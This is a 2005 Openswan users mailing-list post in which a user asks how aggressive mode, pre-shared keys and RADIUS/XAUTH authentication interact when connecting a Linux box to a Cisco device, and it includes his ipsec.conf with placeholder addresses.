[Openswan Users] IPSec Aggressive Mode
Snitgen, John
John.Snitgen at tnsi.com
Mon Dec 12 11:49:31 CET 2005
Hello,
I'm attempting to establish an IPSec tunnel from a Linux box to a Cisco that is using a Radius server for authentication.
My questions:
When configured to use aggressive mode, is the 'left' parameter in ipsec.conf used as the Radius username? Is the PSK secret in (ipsec.secrets) used as the password for Radius authentication? Does 'rightid' need to be the IP address of the Radius server for my scenario?
Is XAUTH required? From what info I have gathered, it appears that XAUTH is only required if the Radius Server requires a different password than the ipsec secret passphrase.
I am running OpenSwan 1.0.7
This is my ipsec.conf
# /etc/ipsec/ipsec.conf - OpenSwan config file
# basic configuration
config setup
interfaces="ipsec0=ppp0"
klipsdebug=none
plutodebug=all
plutoload=%search
plutostart=%search
conn %default
keylife=24h
ikelifetime=1h
rekeymargin=9m
rekeyfuzz=100%
authby=secret
auth=esp
dpddelay=30
dpdtimeout=60
dpdaction=hold
conn LinuxToCisco
auto=add
#xauth=yes
ike=3des-sha
keyingtries=2
disablearrivalcheck=no
left=static_ip_address_of_Linux_box_ppp0_interface
leftid=an_arbitrary_ip_address_that_matches_the Radius_server's_account_username
leftsubnet=static_ip_address_of_Linux_box_ppp0_interface/32
leftnexthop=gateway_ip_for_the_ppp0_static_ip
right=ip_address_of_Cisco_tunnel_endpoint
rightid=ip_address_of_Cisco_tunnel_endpoint
rightsubnet=xxx.xxx.xxx.0/24
aggrmode=yes
pfs=no
Thanks for any insight,
John
This e-mail message is for the sole use of the intended recipient(s) and may
contain confidential and privileged information of Transaction NetworkServices.
Any unauthorized review, use, disclosure or distribution isprohibited. If you
are not the intended recipient, please contact thesender by reply e-mail and
destroy all copies of the original message.
More information about the Users
mailing list